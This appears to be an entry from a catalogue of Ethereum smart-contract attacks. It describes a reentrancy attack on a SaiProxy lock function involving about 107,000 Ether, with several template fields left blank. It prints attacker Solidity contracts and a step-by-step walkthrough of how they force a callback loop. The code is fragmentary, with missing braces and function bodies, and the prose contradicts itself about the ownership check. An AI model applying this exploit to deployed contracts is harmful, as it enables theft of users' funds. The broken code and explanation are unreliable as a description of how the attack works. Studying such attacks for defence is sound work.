Attack 01

Contract Name


Contract Address


Transaction Count


Invovled Ethers

107172.49 Ethers

Length of the Call Chain

4 external function

Victim Function


Attack Mechanisim

Attack code:

contract TubInterface {
    constructor() payable {}
    SaiProxy s;
    address victim;
    bytes32 temp;
    address gemp;
    function setVictim(address _addr, address _gem) {
        s = SaiProxy(_addr);
        victim = _addr;
        gemp = _gem;
    function cups(bytes32 cup) public returns (address, uint, uint, uint){
        return (victim, 0, 0, 0);
    function gem() public view returns (TokenInterface){

contract TokenInterface {
    bytes32 temp;
    address tubbb;
    SaiProxy s;
    TubInterface tub = new TubInterface();
    function setVictim(address _addr, address _tub) {
        s = SaiProxy(_addr);
        tubbb = _tub;
    constructor() payable {}
    function deposit() public payable{
        s.lock.value(1 ether)(tubbb, temp);

Attacked code:

contract SaiProxy is DSMath {
    function lock(address tub_, bytes32 cup) public payable {
        if (msg.value > 0) {
            TubInterface tub = TubInterface(tub_);

            (address lad,,,) = tub.cups(cup);
            require(lad == address(this), "cup-not-owned");


In this case, the goal of our reentrancy is tub.gem().deposit.value(msg.value)(); in the victim code. To reach our goal we need pass three conditions. Firstly we need to make sure the msg.value is greater than 0. Next we need to declare a new TuberInterface instance and call its cups function to return a address to the variable lad. Last, we need to make sure the address stored in lad equals to the address of the victim contract.

Preparation. We call setVictim function in attack code to set the address of victim code to the variable _addr and set the address of the other attack contract TokenInterface to _gem. Next we call the other setVictim function in contract TokenInterface then set the address of victim code to _addr and set tubbb an address the same as _addr.

Attack. The attacker call deposit function, it calls lock function in victim contract. The if condition is satisfied because we our call is appended by .value. Next, the contract initialize an instance of the contract TubInterface and call cup to get the address. Unfortunately, the function involved in this attack is well manipulated and we won’t let it fail. Then the contract checks whether the lad equals to the address of the victim contract. It doesn’t work. We finally get to the key statement tub.gem().deposit which calls back to the gem function in attacker’s contract. Hence, a call loop is formed and we achieved a Reentrancy attack.